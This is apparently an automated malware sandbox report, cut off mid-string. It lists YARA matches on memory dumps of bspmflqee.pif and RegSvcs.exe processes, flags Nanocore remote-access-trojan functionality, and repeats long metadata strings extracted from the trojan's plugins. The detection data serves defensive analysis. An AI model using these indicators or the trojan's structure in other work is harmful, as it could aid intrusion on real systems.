        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a107ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.42de458.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423204049.0000000004A4A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421938786.0000000004AB4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.450398182.0000000003B99000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386483303.0000000004393000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384746745.00000000042C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421415700.0000000004A7F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.450263245.0000000002B91000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513759179.000000000437C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423042439.0000000004AE8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423278623.0000000004AB3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423077125.0000000004A7F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513522579.00000000042DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.387003815.0000000003526000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513627931.0000000004314000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421689539.0000000004A4A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.446552957.0000000000502000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513035581.00000000042DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513434193.0000000004276000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513576200.0000000004314000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516238923.0000000004313000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.539250856.00000000039C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471749969.0000000003E23000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386831922.000000000435E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384936448.00000000042C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384792516.000000000432A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468945390.0000000003DEF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.422088669.0000000004AE8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386582858.000000000432A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.422141219.0000000004B1C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.567098678.00000000011A2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513192668.00000000042AA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.539382391.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516361406.0000000004276000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.570251514.0000000003861000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469891641.0000000003E8C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421763189.0000000004A16000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423525061.00000000049E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469212700.0000000003E24000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.472098835.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513666767.0000000004348000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.493660606.0000000003711000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.420907021.0000000004A16000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421847119.0000000004A7F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469336157.0000000003E24000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471685199.0000000003DBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.422029126.0000000004AB4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.537091542.0000000001302000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516187648.00000000042AA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.467883620.0000000003D86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468798612.0000000003D86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384816077.0000000003526000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468698040.0000000003DBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469466887.0000000003E58000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468029326.0000000003DEF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.385533357.0000000004393000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471893908.0000000003D86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471520869.0000000003DEF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.515810065.00000000042DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423356287.0000000004A16000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386935348.00000000042C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421567836.00000000049E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516555865.0000000004241000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386760974.000000000435E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.492519775.0000000001302000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513089293.0000000004241000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384853009.00000000042F6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.575657153.0000000006FB0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.512868270.0000000004276000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.493877285.0000000004719000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468116768.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 3836, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4644, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 1048, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 3032, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 4732, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: bspmflqee.pif, 00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: RegSvcs.exe, 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
        Source: bspmflqee.pif, 0000000C.00000003.421938786.0000000004AB4000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000013.00000002.450398182.0000000003B99000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000013.00000002.450398182.0000000003B99000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: RegSvcs.exe, 00000013.00000002.450398182.0000000003B99000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
        Source: bspmflqee.pif, 00000016.00000003.468945390.0000000003DEF000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000018.00000002.493660606.0000000003711000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000018.00000002.493660606.0000000003711000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: RegSvcs.exe, 00000018.00000002.493660606.0000000003711000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
        Source: bspmflqee.pif, 0000001D.00000003.513759179.000000000437C000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000020.00000002.539250856.00000000039C1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000020.00000002.539250856.00000000039C1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: RegSvcs.exe, 00000020.00000002.539250856.00000000039C1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAt